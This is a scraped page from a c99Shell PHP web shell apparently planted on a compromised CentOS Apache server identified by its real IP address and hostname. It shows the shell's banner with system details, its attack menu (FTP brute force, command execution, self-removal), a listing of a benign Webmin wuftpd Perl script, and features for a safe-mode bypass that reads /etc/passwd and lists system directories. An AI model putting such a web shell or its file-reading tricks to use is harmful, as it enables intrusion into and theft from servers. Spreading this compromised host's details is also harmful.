110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/wuftpd/ drwxr-xr-x Free 49.58 GB of 127.8 GB (38.8%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/libexec/webmin/wuftpd/ drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# save_log.cgi
# Save miscellaneous options

require './wuftpd-lib.pl';
&error_setup($text{'misc_err'});
&ReadParse();
&lock_file($config{'ftpaccess'});
$conf = &get_ftpaccess();

# Save ls* commands
foreach $l ('lslong', 'lsshort', 'lsplain') {
    if ($in{$l."_def"}) {
        &save_directive($conf, $l, [ ]);
        }
    elsif ($in{$l} !~ /\S/) {
        &error($text{"misc_e$l"});
        }
    else {
        &save_directive($conf, $l, [ { 'name' => $l,
                           'values' => [ $in{$l} ] } ] );
        }
    }

# Save shutdown command
if ($in{'shutdown_def'}) {
    &save_directive($conf, 'shutdown', [ ]);
    }
elsif ($in{'shutdown'} !~ /\S/) {
    &error($text{'misc_eshutdown'});
    }
else {
    &save_directive($conf, 'shutdown',
            [ { 'name' => 'shutdown',
                'values' => [ $in{'shutdown'} ] } ] );
    }

# Save nice options
for($i=0; defined($ndelta = $in{"ndelta_$i"}); $i++) {
    next if ($ndelta eq '');
    $ndelta =~ /^[\-0-9]+$/ || &error(&text('misc_edelta', $ndelta));
    push(@nice, { 'name' => 'nice',
              'values' => [ $ndelta, $in{"nclass_$i"} ] } );
    }
&save_directive($conf, 'nice', \@nice);

# Save defumask options
for($i=0; defined($umask = $in{"umask_$i"}); $i++) {
    next if ($umask eq '');
    $umask =~ /^[0-9]+$/ || &error(&text('misc_eumask', $umask));
    push(@umask, { 'name' => 'defumask',
               'values' => [ $umask, $in{"uclass_$i"} ] } );
    }
&save_directive($conf, 'defumask', \@umask);

&flush_file_lines();
&unlock_file($config{'ftpaccess'});
&webmin_log("misc", undef, undef, \%in);
&redirect("");

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: